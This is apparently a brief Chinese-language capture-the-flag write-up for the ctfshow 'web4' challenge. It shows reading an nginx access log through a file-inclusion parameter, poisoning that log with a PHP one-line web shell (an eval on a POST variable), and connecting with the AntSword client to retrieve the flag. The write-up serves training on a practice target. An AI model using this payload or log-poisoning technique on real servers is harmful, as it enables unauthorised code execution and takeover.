ctfshow web4

本次解法使用工具:burpsuite和中国蚁剑

这是web3的进化版,老的方法已经行不通 了,只能通过日志注入得到shell

这里我们输入默认目录获取日志 ?url=/var/log/nginx/access.log

ctfshow web4

之后就得到了日志文件

ctfshow web4
接下来就要进行日志注入,这里在参数中输入一句话木马 <?php @eval($_POST['a']);?>防止在重新发包是被URL编码
ctfshow web4
接下来就该掏出中国蚁剑啦

ctfshow web4
对日志注入后的网页进行连接可以发现在其www目录下有一个flag文件,这就是我们需要的flag了
ctfshow web4

点开它就可以看到flag了

ctfshow web4

总结:这对于web3来说算是一次提升,在php伪协议不可用时就可以使用这种方法

ctfshow web4